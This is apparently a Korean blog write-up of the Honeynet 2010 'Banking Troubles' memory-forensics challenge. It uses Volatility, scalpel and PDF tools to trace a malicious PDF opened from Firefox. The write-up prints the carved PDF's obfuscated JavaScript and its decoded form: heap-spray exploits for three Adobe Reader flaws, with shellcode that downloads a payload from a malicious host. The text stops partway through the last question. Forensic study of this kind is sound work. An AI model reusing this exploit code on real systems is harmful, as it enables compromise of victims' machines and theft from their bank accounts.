Challenge 3 of the Forensic Challenge 2010 – Banking Troubles

이번 첼린지는 메모리 덤프에 대한 분석인데, 처음 해보는거라 풀이를 참고했다. 우선 Volatility 툴을 처음 알게되었고 사용법을 어느정도 익히게 된거 같아 나름 뿌듯하다.
http://www.honeynet.org/challenges/2010_3_banking_troubles

1. List the processes that were running on the victim’s machine. Which process was most likely responsible for the initial exploit? (2pts)

우선 프로세스 리스트는 Volatility (https://www.volatilesystems.com/default/volatility) 를 이용하여 확인할 수 있다.
그리고 배치파일 (http://volatility.googlecode.com/files/vol-Report%28win%29.zip) 을 이용하면 분석하기 편하다.
좀 더 자세한 내용은 http://ykei.egloos.com/5054373 페이지를 참고하기 바란다.
[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility pslist -f Bob.vmem
Name                 Pid    PPid   Thds   Hnds   Time
System               4      0      58     573    Thu Jan 01 00:00:00 1970
smss.exe             548    4      3      21     Fri Feb 26 03:34:02 2010
csrss.exe            612    548    12     423    Fri Feb 26 03:34:04 2010
winlogon.exe         644    548    21     521    Fri Feb 26 03:34:04 2010
services.exe         688    644    16     293    Fri Feb 26 03:34:05 2010
lsass.exe            700    644    22     416    Fri Feb 26 03:34:06 2010
vmacthlp.exe         852    688    1      35     Fri Feb 26 03:34:06 2010
svchost.exe          880    688    28     340    Fri Feb 26 03:34:07 2010
svchost.exe          948    688    10     276    Fri Feb 26 03:34:07 2010
svchost.exe          1040   688    83     1515   Fri Feb 26 03:34:07 2010
svchost.exe          1100   688    6      96     Fri Feb 26 03:34:07 2010
svchost.exe          1244   688    19     239    Fri Feb 26 03:34:08 2010
spoolsv.exe          1460   688    11     129    Fri Feb 26 03:34:10 2010
vmtoolsd.exe         1628   688    5      220    Fri Feb 26 03:34:25 2010
VMUpgradeHelper      1836   688    4      108    Fri Feb 26 03:34:34 2010
alg.exe              2024   688    7      130    Fri Feb 26 03:34:35 2010
explorer.exe         1756   1660   14     345    Fri Feb 26 03:34:38 2010
VMwareTray.exe       1108   1756   1      59     Fri Feb 26 03:34:39 2010
VMwareUser.exe       1116   1756   4      179    Fri Feb 26 03:34:39 2010
wscntfy.exe          1132   1040   1      38     Fri Feb 26 03:34:40 2010
msiexec.exe          244    688    5      181    Fri Feb 26 03:46:06 2010
msiexec.exe          452    244    0      -1     Fri Feb 26 03:46:07 2010
wuauclt.exe          440    1040   8      188    Sat Feb 27 19:48:49 2010
wuauclt.exe          232    1040   4      136    Sat Feb 27 19:49:11 2010
firefox.exe          888    1756   9      172    Sat Feb 27 20:11:53 2010
AcroRd32.exe         1752   888    8      184    Sat Feb 27 20:12:23 2010
svchost.exe          1384   688    9      101    Sat Feb 27 20:12:36 2010
[/code]

추가로 exploit이 실행된 프로세스는 PDF 파일을 연 후 문제가 발생했다고 하였으니 AcroRd32.exe 일 것으로 보인다.
그리고 AcroRd32.exe 프로세스의 PID는 1752 이며 PPID는 888로 firefox.exe 이다.

따라서 Firefox 웹브라우져에서 PDF 파일을 연 후 문제가 발생한 것으로 볼 수 있다.

2. List the sockets that were open on the victim’s machine during infection. Are there any suspicious processes that have sockets open? (4pts)

[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility connscan2 -f Bob.vmem
Local Address             Remote Address            Pid
————————- ————————- ——

192.168.0.176:1176        212.150.164.203:80        888
192.168.0.176:1189        192.168.0.1:9393          1244
192.168.0.176:2869        192.168.0.1:30379         1244
192.168.0.176:2869        192.168.0.1:30380         4
0.0.0.0:0                 80.206.204.129:0          0
127.0.0.1:1168            127.0.0.1:1169            888
192.168.0.176:1172        66.249.91.104:80          888
127.0.0.1:1169            127.0.0.1:1168            888
192.168.0.176:1171        66.249.90.104:80          888
192.168.0.176:1178        212.150.164.203:80        1752
192.168.0.176:1184        193.104.22.71:80          880
192.168.0.176:1185        193.104.22.71:80          880
[/code]

PID가 1752인것을 찾으면 212.150.164.203 이다. 그리고 PID가 888인 Firefox 브라우져에서 역시 212.150.164.203 으로 접근한 기록이 있다.

3. List any suspicious URLs that may be in the suspected process’s memory. (2pts)

[code lang-bash]strings Bob.vmem | grep http > output.txt
[/code]

위 명령어로 output.txt로 저장할 수 있다. 너무 많군 -_-

4. Are there any other processes that contain URLs that may point to banking troubles? If so, what are these processes and what are the URLs? (4pts)

위 3번에서 저장한 리스트를 대상으로 아래 명령어로 검색을 하면 아래 결과가 나온다.
[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>cat output | grep bank
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias//GotoWelcome
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias/
/GotoWelcome
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias//GotoWelcome
.
.
.
[이하 생략]
[/code]

5. Were there any files that were able to be extracted from the initial process? How were these files extracted? (6pts)

우선 volatility 를 이용하여 PID가 1752인 프로세스 덤프를 저장하도록 한다.
[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility usrdmp_ex_2 -f Bob.vmem -p 1752
[/code]

저장 후 Scapel을 이용하여 PDF 파일만 추출하도록 conf 파일에 설정 후 추출하면 총 9개의 파일을 추출할 수 있다.

6. If there was a file extracted from the initial process, what techniques did it use to perform the exploit? (8pts)

우선 file 명령어를 이용하여 확인하면 아래와 같다.
[code lang-bash]D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>file

00000000.pdf:  data
00000001.pdf:  data
00000002.pdf:  PDF document, version .
00000003.pdf:  PDF document, version %..
00000004.pdf:  PDF document, version 1.5
00000005.pdf:  PDF document, version 1.5
00000006.pdf:  PDF document, version 1.5
00000007.pdf:  PDF document, version 1.4
00000008.pdf:  PDF document, version 1.3
[/code]

4, 5, 6, 7, 8 파일명의 파일만 정상적인 파일로 보이니 해당 파일에 대해 PDFiD (http://blog.didierstevens.com/2009/03/31/pdfid/) 를 이용하여 확인하면 6번 파일에서 javascript를 확인할 수 있다.

6번 파일을 pdf-parser (http://blog.didierstevens.com/programs/pdf-tools/)를 이용하여 확인하면 아래와 같다.
[code lang-bash]D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdfid.py 00000006.pdf
PDFiD 0.0.10 00000006.pdf
 PDF Header: %PDF-1.5
 obj                  113
 endobj               113
 stream                35
 endstream             35
 xref                   5
 trailer                5
 startxref              4
 /Page                  9
 /Encrypt               1
 /ObjStm                0
 /JS                    1
 /JavaScript            1
 /AA                    1
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py –search javascript 00000006.pdf
obj 11 0
 Type:
 Referencing: 1054 0 R
 [(1, ‘\r\n’), (2, ‘<<‘), (2, ‘/S’), (2, ‘/JavaScript’), (2, ‘/JS’), (1, ‘ ‘), (3, ‘1054’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘>>’), (1, ‘\r\n’)]

 <<
   /S /JavaScript
   /JS 1054 0 R
 >>

D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py -o 11 00000006.pdf
obj 11 0
 Type:
 Referencing:
 [(1, ‘\r’), (3, ‘0’), (1, ‘ \r’)]

obj 11 0
 Type:
 Referencing: 1054 0 R
 [(1, ‘\r\n’), (2, ‘<<‘), (2, ‘/S’), (2, ‘/JavaScript’), (2, ‘/JS’), (1, ‘ ‘), (3, ‘1054’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘>>’), (1, ‘\r\n’)]

 <<
   /S /JavaScript
   /JS 1054 0 R
 >>

D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py -o 1054 –raw –filter 00000006.pdf
obj 1054 0
 Type:
 Referencing:
 Contains stream

<</Length 0000/Filter [/F#6c#61#74e#44e#63#6fde/#41#53#43II#38#35#44#65#63#6fd#65]>>

 <<
   /Length 0000
   /Filter [
   /FlateDecode /ASCII85Decode]
 >>

var xtdxJYVm=’0111100000101011000001110010111100100001001101110001111100011011001011110100111100100101001100000001000100100111000000100110100100000011000111100011111100101001001011000100001000000011000011010000001100111000001000110100100000101100000110000001000000101110001110010000001001011001000111000001100100100010000111110000001001011101000000000001111100110111001001010010011000100010011011110111111001001011001010010011001000101111001100100010110101100110001010110011101100110011001110010000000000001101011110000111100000010100001100100011100000000011000010110110100000010100011011000011011100101011000110100011101100000101001110010111000100000010000000100010100000000011001100110100010000111100001001000000011000001011001000010010000100100011000000000001011001001111011110110101011000100001001011100001010000100101001110000110100001110100010001010111100100110001010110000011001000111000001110110010011000000011001100000000001100011010010100010000000100100010000110000011011000011110010011110111101000111000000001100010110100010101011000010010111100100010000011000001110100101000010001000011110000001111001111000110110101001001000010100001101100100110010100100101100101001011001101000001010001110111001101110100011001111101000101100000110001110110010110010100111001000000001110010000010101111110000100100110010101011001000010010010001001011010011010010101111100101011000100100000001001010111000110000100100000101110000100000011110001001001000101000110110101100000001010100000010101010100001100010010110100101110001110010000110001100000010011100101110101110100001101100001111001001000010011100001011100010000000101010001001101000110011101100110100000001010000100000001100101011101001001110101001001001110001101000001010001101111001000000110001101110111000111010011001001011110010110110101100100010110001010100001011001010000001100010100011000010010000010010001001101110011000000100111010101011010001101010000011000011101011001000000101001110101000010110010011100010010011111110101110100111011001100010001001100110111000001110101100100010100000001000011100101011001000100110000110000011011001111110010010001111111010001010111111000100010000010010000000100100100001011110101000001011110001010110010010001001100011110100111101101000011000010000001001001100111011100000110000001110001000100100001100001000001011110000100110001011110000001100000011101011111010001000110000000001101001110100000110001010010000001110110000000101001001110100011111001010000011100100111101101010111000101010000001101111011010101000111110001000000001100110001111001010100011100000010100101000101000011100001001001001110010011110111110000100110001001010001111101100110010111100101100101000111001010000001100101100000010010110011110001100111000010010000010001001100010010100010111001101000001110010010111101010001010000010101101001011101000110010001011101111000010110000010100000010111001100100011110101100101010111010001010000010010001011100000001100100011001100000101011000101111001110100001101001111101010000000100001101011011001101110001110100110100011110110101111101111011000111010010011101111110010010000111101101110111000111100001001000001011000100010010000001111100001101000001100101110010011111000111001000000010000110110010110001011000011111100001010000101100001101000010111100010100001011110010001000000011001101000010011001011000000100110101010001110100001010100000111101000001011111000000001001010100001110100001010001000111000101100010111101010100001100000001100101010010011001100111100100100000001100000011000101010001010110010110010101110101001101100011010001100001011111100011011101011100001001000011111001011101001100000101110000101000000011000011000001111001000000000111000101010010000110010010011001111111000110010100011001000001001010010000111100110101011111010101011101110010000100000011101001100010011000000100101100111010000010000001110101010011010101110110111000111011000101010001010001101100001101110010101101100010000110010011101101010001010101010101111000010111000111010011011001111001000100100001100101111100000011000010000101000110011100000100001000101011001111010010111101010110011000000100001101111001000011110001111001110001010101110011100001011101001100100001110101001000000000100011100100000101000111100011000100101101010000010110011000110010000100100010010000000111001011010010101001100001000101100010011000001111000001000010110100101110000110010001100000110100010001100110011001010011000011000010011100000011011011100110101100010101001100110011110000000011000001100001111101010101001100000011011100100101011101100100110100100000001011110000011001110111000000110100011101101111000011000000001001100111010111010111110001111000000100100001101101111001011011100010011100010100000010000001011001011011011000010110000001110010000110000011101100110110011100010001011100101111000100010010110001110010000110000111010100111011001011000010001001000001010010110000001101011110000011100011011001100110011101010100110101001010001010010001101101000100001000010111010000101000001110110000010101001110011001110110001100110010000100110010110101001111010001100111001101111011001010110000011101100001000110110100001101111001000011100010000001001101011101100100000000101101001100100010110001010010001010000011011001101111001100100010001001000011001010100101000000001101001110110010010000111100000111110001011000000110000011010011000001011000011100100100010001110000001001000000000101110010011100100110111101000110001001010011001100010011011111100100010101000110001101100000011101100001011110110100110001110001001100110011111101001111000010100101100001000111001001010001010001111110010100000100011001001100001101010010110000010010010000000100111001100011001111010001001101111100010001110101011000001101001011000011011101101001011101000011011001010011000110100000000001101101011001110111111001111111001001000000011001001010011110100010010101101101000101000001010001111110000000110101111000010001001010110000000100101001000101000111101001010101000101010001100101010100010011100101000101110110001111010000000001000011011111000110011100010100000101100001101001100111011001100011111000000010001101000001000100110101010100110100010001001100001101000011110100001110001011000100101101001100001010000001101101111111001011110101001000101000000110010001001101011000010110100011001100110010000100010001100001001111011101010111011101110011001100000011001100010100001001110011000001010101000100110011110100100111010001010010001000010111000010100010011100111100000000000101100101100000000001100000001101110001011110010101001001100000001010000000110001100011011111000101001101011011000100110001011001000110010010010100011101110000000110100011010001100010001011110110101100110100000110010010111101111101011010100111111000101100001100100001100101100000010110010100010001000011000011000011111101011000010100010111010001000100001001000011001001110100000001010111100001110111000110100001100001011100010011110111100100010011001001100011011101011001010000000101101001100000000101000001010001101101011101110110011100000001000100110010001101110011001101110101110100110001000101000011000101100111000010000101000001110010000110000001010001011101011101110111101101010100000010100000011001110101010110110110000100000111001100010001101101101111001000110101101100110010000011100010001001100010000011010110000000010110000010100011000001010011010001000110001100110111001111110011001001110110000010110100011101111000000010000001101101000010011011010101111001100101001101010001110001001010001011000101011001011011000001100010111101010100000001110100011101001000000110010011011101111000010110000110010101100110000101010001001001000110011110100110000001111110000010010010010001000000011011000110000100000011000111100010000001110110010001000111100100111111000100110000111101011101011001100111101001110110000001010011001101101100010110110111100100101111000111100000000001100000010001110101100001100111001010000000111101100000011000010110000101101101001100000001100101100001000100100110011001100110001100000010001101001101010111110111111000110101000110110000010101000101010111000111001101011111001010100001100001000010010100010101111001110100000110100011001001000000010110100110000000110110000100000001110101101110011000110101110001011001001100110011000101011000010001000111011000101011001110000011100001000000010110010111011101100000010100100111101001011000011000010101001001000001011001000100010101001100011011000111100101000101011011110100101001110010010011100101100001011110011010010110100001100101011000010100101001010101011001110110010001010000010101100110011101000010010100110110000001000100011100100110010001100011011001110101111101101001000111010011001100110000011100110001111000111001000110110011101000001111010010100100101101110100010111100111000001101000011101000111001001111111011100110100101100000010001000100011110101101100000111110001001100010001000100010000111101001100001110010000110001111001001000110011011000011101010100110000011100011111001111110001000000010101011001110111110001110011011011000111110001001001011101010110011001011010001001000001011000001010010100100000110100000001000001110000101000101111010101110000110100111001001010100011101100101010010000100001101000011100000000100001000000111001001001010100001001011100011011100001000000010000000101010110101000001010000010110001100000111000000000110101100100101111001111100011011100010001000001100111100001100111001111000000000000110100001101010000100001000110011100110000000001100110011011000111100001111101001100010001001100000101010101100000000100110011001010100000010100100101010011000010000000010110000110000110001001110010001010100000010001001111010111010111100001111010001110100011100001101011011001010101001001110110011101000110101101111100000111100001100100000011000110010011111101001111001110000000101100010001001110000010010001101110001101100010111000111110001000110011110001100000000100010001111100011101000001110011001001000111011111000000001000110110001001010101010100011000000000100001110000110000000101010110101001100101000001100011000100011111000101010000011101110111011100010101011101001111010000000101011101101001010111010110010101000011001010110010010000111011001001110010111101111100000000000011111000111101010111100001101100100010001111000101010100000011000001110000010000100011001111110110010001010101011010110011010100000000000010010000010000110010010101110001101000001111000100000000011000100000010101000010110100010110001001110010110000001111011110010100000101100001000101000011111100000010001011010001101100101100000010010010001000010111001000010001100000001001001011000100101100110000000000100011011100101110001110100110111000110010000110110000001000100100001000010111110100011110011011000000001000000110000000100110111000100001000110010010100100000101000001010110100000100101001010010011110101011000010000000010101100110100010111010011011101000100001000010001000100110111010111100010010001010110000010100110011101000000010100000000011000001100000110110010101000100010010001100001011000000000001011100000001100001000011000100011111100000011000101000000001000101101000010100101101001110010011110100101011001010001010101010101111100101011001111110011111000100001000001110101001101101011000001000000011100100000001111110011111101010011001000100011111100101101001101110100110000101111000001110001010000011001000011100010110000011010000001000000000000110011000011110111011100010001001101100010111000111001001000100010111101001011000001000011110100011000000110000000011000000100001100100001110100000010000011100011110000100100000110010001110000000001000000100100010000101111000100000011101000000101001110000101000101010010011010110101010100100100001001010001010101010010000101100010011000001010000000100000101100100111010100010101010100110011011100000000000000011000000000000010000000110111000000000001100100101111011101010001011100010101001111010110101001011100000000100001111100001010001001000111010100110001001100100010101101100101000011110001000100111101011101100000110000111001001010000010100000101011011011110111111001111001000100010001101000000100000000010001110100011100001000110001111101010011000101100001011000011000011000010011101000100011000000010101101100100010000111010010000101101111001011100011110000000110001110000010101000111111010110100011100000001100000011000111100000001000001111110001100100000001000001000011110001110000010110010100101100100010000001010000000001000110001010010010100000110001001011000110110001000111001000110000010000011000011110010010110001010011001011010011111100101000011001010011011100000101001010010100001100101001001101000011010100010101000000100001100000001111001110000011111001110000011111100110000000001010000010110010110001001000010101110110101101010000000110110001111100100100001101110001001100000100011001110000101100111111001001100110000100101101011001010000000100100000000001010101000001001010000010110110011001100011011010110111011101000011010010000111010001010010011111010011111100111000001001100111111100111100001010000011001101111001010100000010110000100001000110100111111101010110011101100001101100100010010000000000011001000001010110000000100100011001010000110111101001010101010001100011001000000000010001000000110001011010011101100001001100010011010111110110010001000001001010100010111000011100011000100011001101001010001110110000101100111100011101110000111101111110011001100011111000011100011100000010010100011011000000010000111000110110010101100101001001010001010111000011011100111001010000100110100100010011000101000010111000001111011100010101110101110001000000010001010100111100011000100011010101011100010000000000100000100000010011110001001101000111011000000011001000111111011110010111010001101101001100000000111000000010010001100010110001100111001101010000100000011101010100100001000101110111011001000001011100111010000100110101101000101000011110010000011000111000001001100111000001111100001000000010110100101111001101010000110101101001001110000011111100110110010111000011011000011111000010000000111100011001011111110101000001110110001110000011011100111001001000010000101001001100010001100011111100100011011000010100100101000101011110010011011100110000011001110111110101111101011111000011100000011110010111100101110001110100011111110010101100111000011110000101111001110110000011110000101100111000010101110010000001101011000001000011010100001101011110110111010101000000010110100011010000100000011000100110000101110101010010010000111100111101011111000101111000101100010000110001011000000101010110000111010101110010001001110001000100011100011000100101000101011001011001110011101100111011011100010110001100001100011000100011111100100101010001110111010100001100011000110000011000111010011001000100011101101100010111000000110000100111010101000111000000000101001111010000110100010010010001010110000000100011001100000001111100011111000101110010111101101000000111100010111000000011010100010100010001010011011001110010110000111000000010000111100101111111011101000000111000011000010000000110000001000110011000110001101100110100001100010001110000010010010101000010110100101100010111100111100101110010000101100010110100101100011100000111111100001110000101100000100100110100000000010011000000101001000100010010111100111110010101000010001101011100010000010001100000100011011001100111000100110000010101000001110100011100011111110011011100110100010000000001101000111000010100110111101101000001001010000011011100010000010100010100011101101011011001100000010000110110010100100101110000100001011111110000100000000011011100100010011101001011001110000011011000110001011010110000110001111001011111000011100000100110011100100000111001100101010001110000101000010110001101110100000101011100011000100010101000111000010100010111111001110110001010100011111100001100010111000100101001001000000001000011000000000000011111100001011100000010010101000010101100010001010110000110001001100011001100010011110100110100011101110010101100101101011000110000011000000001010001110111011101011111000010000010100100101101010101110111111101110010011011110000110100111111010001110100101000000111010011100000010000110111011011010011000100001011000101000001011000110000001100010111010101100011000001110001001100011000000010000000110000001010010110100010100000010010001011100011011000101110001010000000101100100001000010000110011001001001010101000011101000110001001001010101001001000000001110100011111100011111000011110000000100011111011110100001111100101101001001010111110101110101000010110001001000011100010000110000101101111110010000100011100000101111011100100110101101011101011001100000110000111110010001100100111000010111001000010011111000011011011111110111011101011110010011000000100000000111001000000101011000100011000110110010111100101101011011010001001101111001001011010010110000000111010110100100000100000010011111010010101000100110010111010111000101000000011010100010111000111100011000110000010001110101001000110011101100110010010110100101000101010111001111000001101100101111011100010101100101000100011111010011010100100001011110100000000001011100011100010001011000001100010000010100001101011001000101110000111000000001011111100011011000001111011011110001111100110010011101010001010001100011001100000001011100011010001111100011000000100110000011100001100100010010010111100101100001111011011110100011011000000010011011000111100001101111011111010011000100100011000001100111101001110101010101110011010000010011011100100101111101111011011001100010100000100000011011000000100001001111010110110000101100011011010001100100111001000001011110000001101100010001001100010101101001111110011111000011100100010110011010010101100101111101001001000011101100111011010111110101100000011011011100000000010000011111011100000111110101000011011100010001101100110111011101110111011100100011011101100000010100111111011100110000001101010101000011000000011000111110001100100001010001100100010000100011000100000010010101000101000101011110010000010000100100110110010100000111111001110111001100110001000000010110010100100110001000000000000100100001101100010110000101010111100101100111010101010000101000100101000101110000010001001110010011000000101100011001010100100010101001101110000110110000111100101111010110000100001000111110000000110001000100101101011000110100011101011111010001000010010000111010001111110010110000000011011000010000011000110110000100100100011100010011001000000001100100100111000101100000110001110000010010000000011000100101011010000111101101110010011101000010101000000111010011010100010001110111010111010000111000011111010110000110011001000110011011100001011000110010010101110010100101001011001100000
[/code]

위 코드를 풀면 아래와 같이 나온다.
[code]function OzWJi(rzRoI,fxLUb){while(rzRoI.length2<fxLUb){rzRoI+=rzRoI;}
return rzRoI.substring(0,fxLUb/2);}
function bSuTN(){var Uueqk=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u323D\u0000%25%30%25%30%25%30%25%30%25%30%25%30");var HWXsi=202116108;var ZkzwV=[];var HsVTm=4194304;var EgAxi=Uueqk.length
2;var fxLUb=HsVTm-(EgAxi+0x38);var rzRoI=sly("\u9090\u9090");rzRoI=OzWJi(rzRoI,fxLUb);var tfFQG=(HWXsi-4194304)/HsVTm;for(var gtqHE=0;gtqHE<tfFQG;gtqHE++){ZkzwV[gtqHE]=rzRoI+Uueqk;}
var eHmqR=sly("\u0c0c\u0c0c");while(eHmqR.length<44952)eHmqR+=eHmqR;this.collabStore=Collab.collectEmailInfo({subj:"",msg:eHmqR});}
function Soy(){var dwl=new Array();function ppu(BtM,dqO){while(BtM.length2<dqO){BtM+=BtM;}
BtM=BtM.substring(0,dqO/2);return BtM;}
XrS=0x30303030;HRb=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u313D\u0000\u0000%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26");var jxU=4194304;var RaR=HRb.length
2;var dqO=jxU-(RaR+0x38);var BtM=sly("\u9090\u9090");BtM=ppu(BtM,dqO);var JYD=(XrS-4194304)/jxU;for(var Prn=0;Prn<JYD;Prn++){dwl[Prn]=BtM+HRb;}
var IdI="66055447950636260127";for(sly=0;sly<138*2;sly++){IdI+="3";}
util.printf("%45000f",IdI);}
function ynu(shG)
{shG=shG.replace(/[+1]/g,"0");shG=shG.replace(/[+2]/g,"9");shG=shG.replace(/[+3]/g,"8");shG=shG.replace(/[+4]/g,"7");shG=shG.replace(/[+5]/g,"6");shG=shG.replace(/[+6]/g,"5");shG=shG.replace(/[+7]/g,"4");shG=shG.replace(/[+8]/g,"3");shG=shG.replace(/[+9]/g,"2");shG=shG.replace(/[+0]/g,"1");return shG;}
function XiIHG(){var cqcNr=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u333D\u0000\u1334\u1334");dPl=sly("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+cqcNr;FQI=sly("\u9090\u9090");fhT=5*2;sLa=fhT+dPl.length;while(FQI.length<sLa)FQI+=FQI;NJn=FQI.substring(0,sLa);eUq=FQI.substring(0,FQI.length-sLa);while(eUq.length+sLa<0x40000)eUq=eUq+eUq+NJn;Cwy=[];for(XWT=0;XWT<180;XWT++)Cwy[XWT]=eUq+dPl;var kKG=4012;var LwZ=Array(kKG);for(XWT=0;XWT<kKG;XWT++)
{LwZ[XWT]=sly("\u000a\u000a\u000a\u000a");}
Collab.getIcon(LwZ+"_N.bundle");}
var sly=unescape,ZgA=app.viewerVersion.toString(),TjP=this;if(ZgA<8)
{bSuTN();}
if(ZgA>=8&&ZgA<9)
{Soy();}
if(ZgA<=9)
{XiIHG();}
[/code]

Adobe Reader 버전이 8보다 작으면 아래 취약점을 이용한다.
bSuTN() : Collab.collectEmailInfo / CVE-2007-5659

Adobe Reader 버전이 8 이거나 8보다 크고 9보다 작을 경우 아래 취약점을 이용한다.
Soy() : util.printf / CVE-2008-2992

Adobe Reader 버전이 9 이거나 9보다 작을 경우 아래 취약점을 이용한다.
XiIHG() : Collab.getIcon / CVE-2009-0927

추가로 최종적으로 연결하는 URL은 아래와 같다.
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=x

7. List suspicious files that were loaded by any processes on the victim’s machine. From this information, what was a possible payload of the initial exploit be that would be affecting the victim’s bank account? (2pts)

3번에서 저장한 output 파일을 이용하여 위 Exploit 코드에서 접근하는 URL을 검색하면 아래와 같다.
[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>cat output | grep search-network
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/favicon.ico
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=1
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
.
.
[생략]
[/code]

그리고 PID가 1752인 프로세스와 관련된 파일을 검색하면 아래와 같다.
